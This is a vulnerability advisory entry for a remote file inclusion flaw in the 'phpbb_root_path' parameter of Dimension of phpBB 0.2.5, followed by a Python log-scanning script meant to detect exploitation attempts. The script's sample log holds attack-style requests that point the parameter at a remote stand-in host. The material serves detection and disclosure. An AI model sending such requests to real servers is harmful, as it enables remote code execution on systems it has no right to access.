Vendor: Dimension of phpBB
By: SpiderZ
CVSS: 9.3 (HIGH)
Type: Remote File Inclusion
CWE: 94
Product Name: Dimension of phpBB
Affected Version From: 0.2.5 (phpBB 2.0.21)
Affected Version To: 0.2.5 (phpBB 2.0.21)
Patch Exists: Yes
Related CWE: N/A
CPE: a:phpbb_group:dimension_of_phpbb
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006
Dimension of phpBB Remote File Inclusion Vulnerability
Dimension of phpBB 0.2.5 (phpBB 2.0.21) contains a remote file inclusion vulnerability. The 'themen_portal_mitte.php' and 'logger_engine.php' scripts do not sufficiently sanitize user-supplied input to the 'phpbb_root_path' parameter. An attacker can exploit this by sending a maliciously crafted HTTP request to the vulnerable system; successful exploitation results in arbitrary code execution on that system.
Mitigation:
Upgrade to the latest version of Dimension of phpBB 0.2.5 (phpBB 2.0.21) or later.
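For log review, the description above can be turned into a check of web-server access logs for requests that pass a URL-like 'phpbb_root_path' value to either script. This is an added example, not code from the advisory or the project; the log lines, the /forum/ prefix, hosts and function names are constructed, and it assumes combined-format access logs.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Script names and parameter name come from the advisory text.
SCRIPTS = {"themen_portal_mitte.php", "logger_engine.php"}
PARAM = "phpbb_root_path"
# Value that starts with a scheme, "//" or a UNC prefix instead of a local relative path.
SCHEME = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*:|//|\\\\)", re.I)
# Request field of a combined-format log line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_value(line):
    """Return the decoded phpbb_root_path value if the line fits the advisory, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    script = unquote(target.path).rsplit("/", 1)[-1].lower()
    if script not in SCRIPTS:
        return None
    for key, value in parse_qsl(target.query, keep_blank_values=True):
        # parse_qsl decodes once; decode again so double-encoded values are caught.
        decoded = unquote(value)
        if key == PARAM and SCHEME.match(decoded):
            return decoded
    return None

def scan(lines):
    """Return (line_number, value) for every log line that should be reviewed."""
    hits = []
    for number, line in enumerate(lines, 1):
        value = suspicious_value(line)
        if value is not None:
            hits.append((number, value))
    return hits

# Constructed sample log (documentation IP ranges, .invalid host, assumed /forum/ prefix).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Oct/2006:10:01:07 +0000] "GET /forum/index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [12/Oct/2006:10:02:31 +0000] "GET /forum/themen_portal_mitte.php?phpbb_root_path=http://files.example.invalid/a.txt HTTP/1.1" 200 312',
    '198.51.100.7 - - [12/Oct/2006:10:02:40 +0000] "GET /forum/logger_engine.php?phpbb_root_path=http%3A%2F%2Ffiles.example.invalid%2Fa.txt HTTP/1.0" 200 298',
    '192.0.2.10 - - [12/Oct/2006:10:03:02 +0000] "GET /forum/logger_engine.php?phpbb_root_path=./ HTTP/1.1" 200 840',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: {PARAM} -> {value}")
```

A hit with a 200 status only shows that the request was served; whether the include actually ran has to be confirmed from the host itself.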